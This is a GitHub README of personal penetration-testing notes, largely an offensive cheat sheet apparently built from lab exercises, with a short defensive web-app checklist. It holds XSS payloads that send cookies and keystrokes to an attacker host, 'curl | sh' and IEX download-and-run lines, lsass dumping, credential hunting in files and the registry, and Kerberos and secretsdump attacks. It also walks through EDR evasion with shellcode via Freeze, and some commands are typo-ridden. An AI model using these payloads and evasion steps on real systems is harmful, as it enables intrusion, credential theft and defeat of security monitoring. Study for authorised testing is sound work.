Skip to content

lcoriolan/Pentest-Resources

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

96 Commits
 
 

Repository files navigation

Pentest-resources

This Document is intended to serve as a working guide for penetration testing resources.

THINGS TO DO

add redteam section clean up notes add software reverse engineering section look into maldev academy shell command binwalk Splunk advanced queries. plink - port forwarding attacks **

Screenshot 2024-10-21 at 8 57 11 PM

Pentest methodology

5 Stages of hacking

-Reconnisance -Scanning and enumeration -Exploitation -Maintaining access -Covering tracks

ANECDOTES

Durring the pentest of an organization, operators were able to achieve domain admin in 4 hours. Following initial access, the team exploited an outdated machine running Windows 2003 using eternal blue. On this machine the team identified outdated credentials that granted access to the Git EA code repository. From there, pentest personnel identified hard coded credentials to multiple services and escalated privileges using those credentials.

Nmap 3.81 “– interactive” on nmap 3.8 allows a user to run shell as root using “!sh”

Low Hanging Fruit

Default passwords

Cisco devices - cisco:cisco admin:admin root:root idrac - root:calvin

Reverse engineering

-- Strace Ltrace

Tools

Gtfobins 
LOLbins 
LOL drivers 
KDMapper is a simple tool that exploits  a vulnerable (iqvw64e.sys) Intel driver to manually map non-signed drivers in memory
	static binaries - https://github.com/andrew-d/static-binaries/tree/master/binaries/linux/x86_64

C2 frameworks

armitage 
Covenant
Powershell Empire and Starkiller
Sliver 
Havoc 

Web application Penetration Testing checklist:

Contact Form Testing The most preferred entry point for spammers is often a web application’s contact form. Therefore the contact form you have in your web application should be able to identify and prevent such spam attacks. Including CAPTCHA is one of the easiest ways of preventing contact form spamming.

Proxy Server(s) Testing Proxy servers play a huge role in scrutinizing the traffic to your web application and pointing out any malicious activity. Therefore ensure the proxy servers within your network are functioning accurately and efficiently. Tools like Burp Proxy and OWSAP ZAP can go a long way in helping you accomplish this task.

Spam Email Filter Testing Ensure spam email filters are functioning properly. Verify if they are successfully filtering the incoming and outgoing traffic and blocking unsolicited emails. In other words, ensure that email security policies are being enforced properly. Because, as we all know, spam mails are the much-preferred mode of attack for hackers.

Network Firewall Testing Make sure your firewall is preventing undesirable traffic from entering into your web application. Also, ensure the security policies configured using the firewall are being implemented properly. A glitch in your firewall is like sending an invitation to hackers to come and hack your web application.

Security Vulnerability Testing Carry out a thorough security check on various aspects associated with your web application like servers and other such network devices and make a list of the security vulnerabilities they pose. Then find and implement ways to fix them.

Credential Encryption Testing Ensure all usernames and passwords are encrypted and transferred over secure “HTTPS” connection so that these credentials are not compromised by hackers through man-in-the-middle or other such attacks. Because just as your web application needs to be secure, so is the sensitive data being submitted by your clients.

Cookie Testing Cookies store data related to user sessions. Therefore this piece of sensitive information, if it is exposed to the hackers, can result in the security of many users who visit your website or web application being compromised. Therefore ensure your cookie data is not exposed. Or in other words, not available in readable format or as plain text.

Testing For Open Ports Open ports on the web server on which your web application has been hosted also present a good opportunity for hackers to exploit your web application’s security. Therefore carry out this security check and ensure there are no open ports on your web server.

Application Login Page Testing Ensure your web application locks itself up after a specific number of unsuccessful login attempts. This is one of the most basic elements, which, when implemented correctly can go a long way in securing your web application from hackers.

Error Message Testing Ensures all your error messages are generic and do not reveal too much about the problem. If you do so, it’s like announcing to the hacking community, “we have a problem here, you’re welcome to exploit it!” For example: “Invalid Credentials” is fine, but the message should not be specific as “invalid username or password.”

HTTP Method(s) Testing Also review the HTTP methods used by your web application to interact with your clients. Ensure PUT and Delete methods are not enabled, as doing so will allow hackers to easily exploit your web application.

Username and Password Testing Test all the usernames/passwords that are used on your web application. Passwords should be fairly complex and usernames should not be easily guessable. Separate such weak usernames and passwords and alert those users to change them.

File Scanning Ensure all files you upload to your web application or server are scanned before they are uploaded.

Web application testing tools

goWitness - take screenshots of pages Dirbuster - GUI directory buster Steghide - scan pictures for stenography Infoga - a tool gathering email accounts information (ip,hostname,country,...) from different public sources) Asset finder - id subdomains with asset finder

Tool Links

PSMAPEXEC -- https://github.com/The-Viper-One/PsMapExec
AMNESIAC -- https://github.com/Leo4j/Amnesiac

Tool Commands

fuff- ffuf -w “wordlist” -X POST -d "username=FUZZ&email=x&password=x&cpassword=x" -H "Content-Type: application/x-www-form-urlencoded" -u http://10.10.19.84/customers/signup -mr "username already exists" # -w selects the file's location The -X argument specifies the request method, The -H argument is used for adding additional headers to the request, The -u argument specifies the URL we are making the request to, the -mr argument is the text on the page we are looking for to validate we've found a valid username.

ffuf -w THMfuff:W1,SecLists/Passwords/Common-Credentials/10-million-password-list-top-100.txt:W2 -X POST -d "username=W1&password=W2" -H "Content-Type: application/x-www-form-urlencoded" -u http://10.10.19.84/customers/login -fc 200, W1 for our list of valid usernames and W2 for the list of passwords we will try. The multiple wordlists are again specified with the -w argument but separated with a comma.  For a positive match, we're using the -fc argument to check for an HTTP status code other than 200.

curl 'http://10.10.19.84/customers/reset?email=robert%40acmeitsupport.thm' -H 'Content-Type: application/x-www-form-urlencoded' -d 'username=robert'

curl -L https://<10.10.10.10>/linpeas.sh | sh# Excute from memory and send output back to the host

Sqlmap-

WGET

gobuster 
	gobuster dir -u http://10.10.151.33 -w SecLists/Discovery/Web-Content/directory-list-1.0.txt

Searchsploit 
	Exploits in search sploit can be found at /usr/share/exploitDB/exploits/

Testing For XSS

You'll need to test every possible point of entry; these include:

Parameters in the URL Query String

URL File Path

Sometimes HTTP Headers (although unlikely exploitable in practice)

How to test for Stored XSS:

example of these could be:

Comments on a blog

User profile information

Website Listings Dom Based XSS:

is where the JavaScript execution happens directly in the browser without any new pages being loaded or data submitted to backend code.

DOM Based XSS can be challenging to test for and requires a certain amount of knowledge of JavaScript to read the source code. You'd need to look for parts of the code that access certain variables that an attacker can have control over, such as "window.location.x" parameters.

When you've found those bits of code, you'd then need to see how they are handled and whether the values are ever written to the web page's DOM or passed to unsafe JavaScript methods such as eval().

How to test for Blind XSS:

When testing for Blind XSS vulnerabilities, you need to ensure your payload has a call back (usually an HTTP request). This way, you know if and when your code is being executed.

A popular tool for Blind XSS attacks is xsshunter. Although it's possible to make your own tool in JavaScript, this tool will automatically capture cookies, URLs, page contents and more.

XSS Payloads

Basic poc: <script>alert('XSS');</script>
Session Stealer: <script>fetch('https://hacker.thm/steal?cookie=' + btoa(document.cookie));</script>
Key Logger: <script>document.onkeypress = function(e) { fetch('https://hacker.thm/log?key=' + btoa(e.key) );}</script>
to escape the input tag first so the payload can run properly. You can do this with the following payload: "><script>alert('THM');</script>. The important part of the payload is the "> which closes the value parameter and then closes the input tag.
To escape the textarea tag a little differently from the input one (in Level Two) by using the following payload: </textarea><script>alert('THM');</script>
To escape the existing JavaScript command, so you're able to run your code; you can do this with the following payload ';alert('THM');//  which you'll see from the below screenshot will execute your code. The ' closes the field specifying the name, then ; signifies the end of the current command, and the // at the end makes anything after it a comment rather than executable code.
When The word script  gets removed from your payload, that's because there is a filter that strips out any potentially dangerous words.When a word gets removed from a string, Try entering the payload <sscriptcript>alert('THM');</sscriptcript> and click the enter button, you'll get an alert popup with the string THM. And then, you'll get a confirmation message that your payload was successful with a link to the next level.
If the < and > characters get filtered out from our payload, preventing us from escaping the IMG tag. To get around the filter, we can take advantage of the additional attributes of the IMG tag, such as the onload event. The onload event executes the code of your choosing once the image specified in the src attribute has loaded onto the web page. Let's change our payload to reflect this /images/cat.jpg" onload="alert('THM'); and then viewing the page source, and you'll see how this will work. 

Popup's (<script>alert(“Hello World”)</script>) - Creates a Hello World message popup on a users browser. ;alert(4) ";alert('XSS');// Writing HTML (document.write) - Override the website's HTML to add your own (essentially defacing the entire page). XSS Keylogger (http://www.xss-payloads.com/payloads/scripts/simplekeylogger.js.html) - You can log all keystrokes of a user, capturing their password and other sensitive information they type into the webpage. Port scanning (http://www.xss-payloads.com/payloads/scripts/portscanapi.js.html) - A mini local port scanner (more information on this is covered in the TryHackMe XSS room). https://example.com/urlmessages/leavingTAC.php?destination=https://cnn.com%22%3E%3Cscript%3Ealert(4)%3C/script%3E

Directory traversal // important directories

Below are some common OS files you could use when testing for directory traversal .

/etc/issue - contains a message or system identification to be printed before the login prompt.

/etc/profile - controls system-wide default variables, such as Export variables, File creation mask (umask), Terminal types, Mail messages to indicate when new mail has arrived

/proc/version - specifies the version of the Linux kernel

/etc/passwd - has all registered user that has access to a system

/etc/shadow - contains information about the system's users' passwords

/root/.bash_history - contains the history commands for root user

/var/log/dmessage - contains global system messages, including the messages that are logged during system startup

/var/mail/root - all emails for root user

/root/.ssh/id_rsa - Private SSH keys for a root or any known valid user on the server

/var/log/apache2/access.log - the accessed requests for Apache  webserver

C:\boot.ini - contains the boot options for computers with BIOS firmware

Other tools

Cyberchef - is a Cyber Swiss Army Knife - a web app for encryption, encoding, compression and data analysis
Crackstation - web hosted tool to crack weak hashes 

File Inclusion

PHP, using functions such as include, require, include_once, and require_once often contribute to vulnerable web applications. LFI vulnerabilities also occur when using other languages such as ASP, JSP, or even in Node.js

Using null bytes is an injection technique where URL-encoded representation such as %00 or 0x00 in hex with user-supplied data to terminate strings. You could think of it as trying to trick the web app into disregarding whatever comes after the Null Byte.

By adding the Null Byte at the end of the payload, we tell the  include function to ignore anything after the null byte which may look like:

include("languages/../../../../../etc/passwd%00").".php"); which equivalent to → include("languages/../../../../../etc/passwd");

NOTE: the %00 trick is fixed and not working with PHP 5.3.4 and above. or the current directory trick at the end of the filtered keyword /. 

If we check the warning message in the include(languages/etc/passwd) section, we know that the web application replaces the ../ with the empty string. There are a couple of techniques we can use to bypass this. First, we can send the following payload to bypass it: ....//....//....//....//....//etc/passwd  source

if the web application asks to supply input that has to include a directory such as: http://webapp.thm/index.php?lang=languages/EN.php then, to exploit this, we need to include the directory in the payload like so: ?lang=languages/../../../../../etc/passwd.			

One requirement for RFI is that the allow_url_fopen option needs to be on

Steps for testing for LFI

Find an entry point that could be via GET, POST, COOKIE, or HTTP header values!

Enter a valid input to see how the web server behaves.

Enter invalid inputs, including special characters and common file names.

Don't always trust what you supply in input forms is what you intended! Use either a browser address bar or a tool such as Burpsuite.

Look for errors while entering invalid input to disclose the current path of the web application; if there are no errors, then trial and error might be your best option.

Understand the input validation and if there are any filters!

Try the inject a valid entry to read sensitive files

Sample curl syntax:└─$ curl -X POST http://10.10.56.253/challenges/chall1.php -d 'method=GET&file=/etc/flag1/ –output'

CSRF

../ can be used for csrf

&x= is used to stop the remaining path from being appended to the end of the attacker's URL and instead turns it into a parameter (?x=) on the query string.

Potential SSRF vulnerabilities can be spotted in web applications When a full URL is used in a parameter in the address bar, A hidden field in a form, A partial URL such as just the hostname, Or perhaps only the path of the URL. this is where a lot of trial and error will be required to find a working payload.

If working with a blind SSRF where no output is reflected back to you, you'll need to use an external HTTP logging tool to monitor requests such as requestbin.com, your own HTTP server or Burp Suite's Collaborator client.

Attackers can bypass a Deny List by using alternative localhost references such as 0, 0.0.0.0, 0000, 127.1, 127...*, 2130706433, 017700000001 or subdomains that have a DNS record which resolves to the IP Address 127.0.0.1 such as 127.0.0.1.nip.io.

in a cloud environment, it would be beneficial to block access to the IP address 169.254.169.254, which contains metadata for the deployed cloud server, including possibly sensitive information. An attacker can bypass this by registering a subdomain on their own domain with a DNS record that points to the IP Address 169.254.169.254.

SSRF

When a full URL is used in a parameter in the address bar:
A hidden field in a form:
A partial URL such as just the hostname:
Or perhaps only the path of the URL:
Some of these examples are easier to exploit than others, and this is where a lot of trial and error will be required to find a working payload. If working with a blind SSRF where no output is reflected back to you, you'll need to use an external HTTP logging tool to monitor requests such as requestbin.com, your own HTTP server or Burp Suite's Collaborator client.

SQLI

we can enter the following into an sql field. ' OR 1=1;-- 'or 1=1-- test' OR 1=1; -- //
blah' or 1=1– // Unauthenticated login || + //Used to concatenate The character ' will close the brackets in the SQL query 'OR' in a SQL statement will return true if either side of it is true. As 1=1 is always true, the whole statement is true. Thus it will tell the server that the email is valid, and log us into user id 0, which happens to be the administrator account. The -- character is used in SQL to comment out data, any restrictions on the login will no longer work as they are interpreted as a comment. This is like the # and // comment in python and javascript respectively.

Sqlmap command

sqlmap -u gml.sample.org/grad/neubrew/BFileCommentsOutput.jsp?brewer= comment= type=*  

Command injection

shell operators ;, & and && will combine two (or more) system commands and execute them both

Command injection can be detected in two ways. Blind or Verbose

For blind injection , the ping and sleep commands are significant payloads to test with. Using ping as an example, the application will hang for x seconds in relation to how many pings you have specified.

For blind injection forcing some output. This can be done by using redirection operators such as >.For example, we can tell the web application to execute commands such as whoami and redirect that to a file. We can then use a command such as cat to read this newly created file’s contents.

curl command is a great way to test for command injection.

Verbose command injection is when the application gives you feedback or output as to what is happening or being executed.For example, the output of commands such as ping or whoami is directly displayed on the web application.

In PHP, many functions interact with the operating system to execute commands via shell; these include: Exec, Passthru, System

Command injection payload cheat sheet.

Sysinternals

a suite of utilities for managing, diagnosing, troubleshooting, and monitoring  environments

Microsoft offers Sysinternals Live, a service that allows you to execute Sysinternals tools directly from the web without downloading them. You can run a tool from Sysinternals Live by typing \\live.sysinternals.com\tools\<toolname> in the Run dialog box (Win+R) or in the Command Prompt.
Process Explorer (procexp.exe): An advanced version of Task Manager that provides detailed information about processes and their dependencies.

Autoruns (autoruns.exe): Shows you what programs are configured to run during system boot-up or login, and the order in which they are launched.

Process Monitor (procmon.exe): A monitoring tool that shows real-time file system, Registry, and process/thread activity.
	When using procmon to examine a process look for vectors available for possible abuse examples below 
		- Process create
  			- check for processes spawned without specific path - thus allowing an attacker to hijack or proxy code execution. 

TCPView (tcpview.exe): Displays all active TCP and UDP endpoints on your system, including the owning process.

BgInfo (bginfo.exe): Automatically displays relevant information about a Windows computer on the desktop's background.

Sysmon (sysmon.exe): Monitors and reports key system activity via the Windows event log, useful for security and forensic analysis.

AccessChk (accesschk.exe): This utility reports the effective permissions for files, registry keys, services, processes, kernel objects, and more.

Disk2vhd (disk2vhd.exe): Creates a Virtual Hard Disk (VHD) version of physical disks for use in Microsoft Virtual PC or Microsoft Hyper-V virtual machines.

PsTools Suite: A set of command-line tools for managing local and remote systems, including pslist, pskill, psexec, and others.

Registry Explorer (regjump.exe): Jump directly to a specific registry key in Regedit.

VMMap (vmmap.exe): Provides a detailed graphical representation of the memory usage of a process.

RAMMap (rammap.exe): An advanced physical memory usage analysis utility.

#LIVING OFF THE LAND WINDOWS ++ Task Scheduler mess with scheduled - taskschd.msc Registry editor analyze reg keys - regedit.exe Active Directory Users and Computers - aduc - search and illuminate users and groups Procdump - can be used to create dumpfile of lsass - procdump.exe -ma lsass.exe

Important windows file locations

Powershell - C:\Windows\System32\WindowsPowershell\v1.0\

Powershell tools

PowerView - https://github.com/darkoperator/Veil-PowerView/blob/master/PowerView/README.md

Powershell/Windows commands

Get-HostIP                      -   resolves a hostname to an IP
Check-Write                     -   checks if the current user can write to the specified file
Set-MacAttribute                -   Sets MAC attributes for a file based on another file or input (from Powersploit)
Invoke-CopyFile                 -   copies a local file to a remote location, matching MAC properties
Test-Server                     -   tests connectivity to a specified server
Get-UserProperties              -   returns all properties specified for users, or a set of user:prop names
Get-ComputerProperties          -   returns all properties specified for computers, or a set of computer:prop names
Get-LastLoggedOn                -   return the last logged on user for a target host
Get-UserLogonEvents             -   returns logon events from the event log for a specified host
Get-UserTGTEvents               -   returns TGT request events for a specified host
Invoke-CheckLocalAdminAccess    -   check if the current user context has local administrator access to a specified host
Invoke-SearchFiles              -   search a local or remote path for files with specific terms in the name
Get-NetDomain                   -   gets the name of the current user's domain
Get-NetForest                   -   gets the forest associated with the current user's domain
Get-NetForestDomains            -   gets all domains for the current forest
Get-NetDomainControllers        -   gets the domain controllers for the current computer's domain
Get-NetCurrentUser              -   gets the current [domain\\]username
Get-NetUser                     -   returns all user objects, or the user specified (wildcard specifiable)
Get-NetUserSPNs                 -   gets all user ServicePrincipalNames
Get-NetOUs                      -   gets data for domain organization units
Invoke-NetUserAdd               -   adds a local or domain user
Get-NetGroups                   -   gets a list of all current groups in the domain
Get-NetGroup                    -   gets data for each user in a specified domain group
Get-NetLocalGroups              -   gets a list of localgroups on a remote host or hosts
Get-NetLocalGroup               -   gets the members of a localgroup on a remote host or hosts
Get-NetLocalServices            -   gets a list of running services/paths on a remote host or hosts
Invoke-NetGroupUserAdd          -   adds a user to a specified local or domain group
Get-NetComputers                -   gets a list of all current servers in the domain
Get-NetFileServers              -   get a list of file servers used by current domain users
Get-NetShare                    -   gets share information for a specified server
Get-NetLoggedon                 -   gets users actively logged onto a specified server
Get-NetSessions                 -   gets active sessions on a specified server
Get-NetFileSessions             -   returned combined Get-NetSessions and Get-NetFiles
Get-NetConnections              -   gets active connections to a specific server resource (share)
Get-NetFiles                    -   gets open files on a server
Get-NetProcesses                -   gets the remote processes and owners on a remote server
Invoke-UserHunter               -   finds machines on the local domain where specified users are logged into, and can optionally check if the current user has local admin access to found machines
Invoke-UserHunterThreaded       -   threaded version of Invoke-UserHunter
Invoke-StealthUserHunter        -   finds all file servers utilizes in user HomeDirectories, and checks the sessions one each file server, hunting for particular users
Invoke-UserProcessHunter        -   hunts for processes on domain machines running under specific target user accounts
Invoke-ProcessHunter            -   hunts for processes with a specific name on domain machines
Invoke-UserEventHunter          -   hunts for user logon events in domain controller event logs
Get-NetDomainTrusts             -   gets all trusts for the current user's domain
Get-NetDomainTrustsLDAP         -   gets all trusts for the current user's domain using just LDAP  queries. This is less accurate than Get-NetDomainTrusts butallows you to relay all traffic through your primary DC.
Get-NetForestTrusts             -   gets all trusts for the forest associated with the current user's domain
Invoke-FindUserTrustGroups      -   enumerates users who are in groups outside of their principal domain
Invoke-FindAllUserTrustGroups   -   map all domain trusts and enumerate all users who are in groups outside  of their principal domain
Invoke-MapDomainTrusts          -   try to build a relational mapping of all domain trusts
Invoke-MapDomainTrustsLDAP      -   try to build a relational mapping of all domain trusts using Get-NetDomainTrustsLDAP
Invoke-Netview                  -   a port of @mubix's netview.exe tool using Get-Net* functionality finds all machines on the local domain and runs various enumeration methods on what it finds
Invoke-NetviewThreaded          -   threaded version of Invoke-NetView
Invoke-UserView                 -   returns parsable session/loggedon user data for a given domain
Invoke-ShareFinder              -   finds (non-standard) shares on hosts in the local domain
Invoke-ShareFinderThreaded      -   threaded version if Invoke-ShareFinder
Invoke-FileFinder               -   finds potentially sensitive files on hosts in the local domain
Invoke-FileFinderThreaded       -   threaded version of Invoke-FileFinder
Invoke-FindLocalAdminAccess     -   finds machines on the domain that the current user has local admin  access to
Invoke-FindLocalAdminAccesThreaded- threaded version of Invoke-FindLocalAdminAccess
Invoke-UserFieldSearch          -   searches a user field for a particular term
Invoke-ComputerFieldSearch      -   searches a computer field for a particular term
Invoke-FindVulnSystems          -   finds systems likely vulnerable to MS08-067
Invoke-HostEnum                 -   run all available enumeration checks on a single host
Invoke-EnumerateLocalAdmins     -   enumerates members of the local Administrators groups across all machines in the domain
Invoke-EnumerateLocalAdminsThreaded     -     threaded version of Invoke-EnumerateLocalAdmins
CTRL+shift+enter		- run as admin 

#windows enum

Net user /domain - pull all users 
   	net user - users on the machine 
net user <username> - check local group membership 
localgroup <username>
Net accounts - password policy 
Hostname - find host name
Copy a file from... : copy \\10.10.10.10\kali\reverse.exe C:\PrivEsc\reverse.exe
Identefy stored passwords rundll32.exe jeymgr.dll,KRShowKeyMgr
Search -  Get-Childitem c:\ -recurese -inlude "search string "
 	systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type" - Search for specific lines in system info - windows enumeration
  	wmic qfe - identify patches - windows enumeration 
   	wmic logicaldisk get caption, description, providername
whoami /groups - 
whoami /priv
whoami groups
route print - arp table 
    netstat -ano - identify running ports 
sc query windefend - identify the status of defender 
sc queryex tyoe= service
netsh advfirewall firewall dump or netsh firewall show state - enumerate windows firewall
	schtasks /query /fo LIST /v - look for scheduled tasks that are run by a priv user 

#windows post exploitation IEX (New-Object Net.WebClient).DownloadString("http:samplle.com") -OutFile file name C:\windows\system32\inetsrv> findstr /si password

Cleartext Passwords Search for them findstr /si password *.txt findstr /si password *.xml findstr /si password *.ini

#Find all those strings in config files. dir /s pass == cred == vnc == .config

Find all passwords in all files.

findstr /spin "password" . findstr /spin "password" . In Files These are common files to find them in. They might be base64-encoded. So look out for that.

c:\sysprep.inf c:\sysprep\sysprep.xml c:\unattend.xml %WINDIR%\Panther\Unattend\Unattended.xml %WINDIR%\Panther\Unattended.xml

dir c:*vnc.ini /s /b dir c:*ultravnc.ini /s /b dir c:\ /s /b | findstr /si *vnc.ini In Registry

VNC

reg query "HKCU\Software\ORL\WinVNC3\Password"

Windows autologin

reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"

SNMP Paramters

reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP"

Putty

reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"

Search for password in registry

reg query HKLM /f password /t REG_SZ /s reg query HKCU /f password /t REG_SZ /s

#use procdump to dump lsass procdump.exe -ma lsass.exe

Windows Privesc

Source: https://safe.menlosecurity.com/https://pentest.coffee/active-directory-lateral-movement-and-post-exploitation-cheat-sheet-3170982a7055
RDP into windows from linux. xfreerdp /u:user /p:password /cert:ignore /v:MACHINE_IP

Registry Keys

Windows Credential Storage: Registry paths like HKEY_LOCAL_MACHINE\SECURITY\Policy\Secrets or HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services can hold saved credentials.
AutoLogin Keys: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon (entries like DefaultUserName, DefaultPassword).
Legacy Software Keys: Older software might store credentials in various registry paths depending on the application.

Applocker Get-ApplockerPolicy -Effective -xml Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections $a = Get-ApplockerPolicy -effective $a.rulecollections

AppLocker rules applied to a host can also be read from the local registry at HKLM\Software\Policies\Microsoft\Windows\SrpV2.

Freeze is a payload toolkit for bypassing EDRs using suspended processes, direct syscalls, and alternative execution methods

You can use Freeze to load and execute your shellcode in a stealthy manner.

Git clone the Freeze repo and build it (git clone https://github.com/optiv/Freeze.git && cd Freeze && go build Freeze.go)
1. Generate some shellcode, in this case I used Havoc C2.
2. ./Freeze -I demon.bin -encrypt -O demon.exe
3. Profit, no alerts from defender

What you need - ATTACKING WINDOWS

DC -Synch To fetch secrets, two security permissions are required: "Replicating Directory Changes" (DS-Replication-Get-Changes) and "Replicating Directory Changes All" (DS-Replication-Get-Changes-All).

Bypassing AV

Obfuscation and Encoding: Common payloads can often be detected by AV software based on their signatures. By obfuscating the payload or encoding it in a way that it is not recognized as malicious until execution, it's possible to evade AV detection.

Packing and Crypting: Packing and crypting the payload can also help to avoid detection. There are various packers and crypters available that can compress or encrypt the executable, making it difficult for AV to analyze.

Living Off the Land (LotL) and LOLBAS: Using built-in system tools and scripts to conduct operations can often bypass AV since these tools are typically trusted by the operating system. This includes using PowerShell, WMI, and other administrative tools that are less likely to be flagged by AV software.

Fileless Attacks: Conducting attacks that do not rely on files and instead execute directly in memory can bypass traditional file scanning by AV solutions.

Polymorphic and Metamorphic Malware: These types of malware change their code as they spread, making it difficult for AVs to recognize them using traditional signature-based detection methods.

Timing-Based Evasion: Some penetration testers find success by timing the execution of their payloads to avoid detection, such as when AV software may be updating or scanning other parts of the system.

Trusted and Signed Binaries: Using binaries that are signed with a trusted certificate can sometimes allow code to execute without being inspected closely by the AV, as the software may trust signed code more than unsigned.

Research and Testing: Continuously researching the latest AV evasion techniques and testing them in a controlled environment to see what works against current AV engines.

Bypassing EDR

Behavioral Evasion: Since EDR systems often use behavioral analysis to detect malicious activity, one approach is to mimic normal user behavior to avoid triggering alerts.
Misconfiguration Exploitation: EDR systems can sometimes be misconfigured. During an authorized test, security professionals may seek to identify and exploit these misconfigurations to bypass the EDR.
Process Injection: Injecting malicious code into legitimate processes can sometimes bypass EDR monitoring, as the process itself is usually trusted.
Process Hollowing: This involves creating a new process in a suspended state, removing its memory, and replacing it with malicious code. When the process resumes, it may bypass the EDR as it appears as a legitimate process.
Direct System Calls: Invoking system calls directly, rather than using the higher-level API functions that EDRs monitor, can sometimes evade detection.
Rootkits: Advanced rootkits can operate at a low level on a computer system, potentially allowing them to evade EDR systems by hiding their presence.
Memory Exploits: Exploiting vulnerabilities that allow for the execution of code directly in memory can sometimes bypass the file-based monitoring of EDR systems.
Custom Malware: Creating unique malware that hasn't been encountered by an EDR can be a way to bypass its signatures and heuristics.
Tool and Script Modification: Modifying existing tools and scripts to alter their behavior or obfuscate their intent can help in evading EDRs that are signature-based.
Encryption and Obfuscation: Encrypting or obfuscating command and control communication can bypass network-based detection mechanisms of EDR systems.
Decoy Processes: Creating decoy processes can distract the EDR system while the actual malicious process runs undetected.
Living Off the Land (LotL) Techniques: Using built-in system tools to carry out attacks can avoid detection as these tools are usually whitelisted by EDR systems.
Timestomping: Modifying timestamps of files to evade detection based on the time of creation or modification.

image

linux commands and tools

Start an SMB server "sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py kali ."

scp important.txt [email protected]:/home/ubuntu/transferred.txt

wget http://127.0.0.1:8000/file

Find a file -- find . -name thisfile.txt

errors will be deleted automatically --2>dev/null: 

Ipconfig /all 

ls -lah 

FIND is for searching files and directories using filters 

sudo -l List the programs which sudo allows your user to run


id command in Linux is used to find out user and group names and numeric ID’s (UID or group ID) of the current user or any other user in the server. This command is useful to find out the following information as listed below:

	User name and real user id.
	Find out the specific Users UID.
	Show the UID and all groups associated with a user.
	List out all the groups a user belongs to.
	Display security context of the current user.

 	head/tail - to cat the first or last 10 lines of a file. -n can be used to show a specific number of lines.  

linux enumeration

ID kenrnal version - uname -a OR cat /proc/version OR cat /etc/issue

linux post exploitation

chmod command is used to change the access mode of a file.
	Options 	Description
	`-R` 	Apply the permission change recursively to all the files and directories within the specified directory.
	`-v` 	It will display a message for each file that is processed. while indicating the permission change that was made.
	`-c` 	It works same as `-v` but in this case it only displays messages for files whose permission is changed.
	`-f` 	It helps in avoiding display of error messages.
	`-h` 	Change the permissions of symbolic links instead of the files they point to.


	Operators 	Definition
	`+` 	Add permissions
	`-` 	Remove permissions
	`=` 	Set the permissions to the specified values

	The following letters that can be used in symbolic mode:
	Letters 	Definition
	`r` 	Read permission
	`w` 	Write permission
	`x` 	Execute permission

	The following Reference that are used:
	Reference 	Class
	u 	Owner
	g 	Group
	o 	Others
	a 	All (owner,groups,others)


John the ripper 
	john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

Generate a new password hash with a password of your choice:
	mkpasswd -m sha-512 newpasswordhere
manual ping sweep - for i in $(seq 254); do ping 10.0.0.${i} -c1 -W1 & done | grep from

grep

find strings of IPaddrs grep -E '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' ips.txt
-B show # number of lines before keyword
-A show lines after keyword
	-C show x number of lines before and after keyword 

VI

:w	writes the contents of the work buffer to the file
:q	quit
:q!	quit without saving changes
ZZ	save and quit
:wq	save and quit
:w filename	saves to filename (allows you to change the name of the file)
i 	insert text before cursor 
esc 	quit text edit

linux Paths

exploitdb - /usr/share/exploitdb
wordlists - /usr/share/wordlists
ssh config - /etc/ssh/sshd_confign

Windows Tools

lsass - mimikatz 
lsass - nanodump 

Active Directory Tools

Bloodhound 

Active directory

Kerbrute - Enumerate users on domain \\ ./kerbrute_linux_amd64 userenum --dc 10.10.251.86 -d spookysec.local /home/jon/Desktop/attacktivedirectory_usrlist
Rubeus - Rubeus is a powerful tool for attacking Kerberos. Brute-Forcing / Password-Spraying w/ Rubeus, Harvesting Tickets w/ Rubeus. Before password spraying with Rubeus, you need to add the domain controller domain name to the windows host file. You can add the IP and domain name to the hosts file from the machine by using the echo command: echo 10.10.251.247 CONTROLLER.local >> C:\Windows\System32\drivers\etc\hosts Password spray attack. Rubeus.exe brute /password:”Password”1 /noticket.Kerberoast command : rubeus.exe kerberoast\\ This command will harvest for TGTs (ticket granting tickets)every 30 seconds Rubeus.exe harvest /interval:30

Rubeus

Rubeus is a powerful tool for attacking Kerberos. Brute-Forcing / Password-Spraying w/ Rubeus, Harvesting Tickets w/ Rubeus Before password spraying with Rubeus, you need to add the domain controller domain name to the windows host file. You can add the IP and domain name to the hosts file from the machine by using the echo command: echo 10.10.251.247 CONTROLLER.local >> C:\Windows\System32\drivers\etc\hosts Password spray attack. Rubeus.exe brute /password:”Password”1 /noticket Kerberoast command : rubeus.exe kerberoast / This command will harvest for TGTs (ticket granting tickets)every 30 seconds Rubeus.exe harvest /interval:30

AS-REP Roasting dumps the krbasrep5 hashes of user accounts that have Kerberos pre-authentication disabled. Unlike Kerberoasting these users do not have to be service accounts the only requirement to be able to AS-REP roast a user is the user must have pre-authentication disabled.

SMBclient Enumerate SMB smbclient -L 10.10.9.47 -U

crackmap See if we have access to shares crackmapexec smb 10.10.9.47 -u guest -p "" --shares Module: -M spider_plus Dont forget to use Crack map modules module will directory walk

Enum4linux Use this tool to enumerate available ports. Can be used for active directory Enum4linux -a Use argument | tee “file name” to export as a file

SMBclient Connect to shares smbclient -U '%' -N \\\ # null session to connect to a windows share OR smbclient -U '' \\\ # authenticated session to connect to a windows share (you will be prompted for a password)

MSFCONSOLE

Scan SMB version - Auxiliary > scammer/smb/smb_version Bruteforce or password spray AD - auxillary > scanner/smb/smb_login

SMBclient To list file share Smbclient -L \\...\ To travel to a directory append the directory name after the “\” Finding the IP for * in windows https://networking.grok.lsu.edu/article.aspx?articleid=14842

AD Attack Privilege Requirements - Kerbrute Enumeration - No domain access required Pass the Ticket - Access as a user to the domain required Kerberoasting - Access as any user required AS-REP Roasting - Access as any user required Golden Ticket - Full domain compromise (domain admin) required Silver Ticket - Service hash required Skeleton Key - Full domain compromise (domain admin) required

Definitions 

Kerberos is the default authentication service for Microsoft Windows domains. Use enum4linux to enumerate active ports 135/445.

Use secretsdump.py to dumpto retrieve all of the password hashes that this user account has to offer - example: python3 secretsdump.py spookysec.local/backup:[email protected] -just-dc-user Administrator

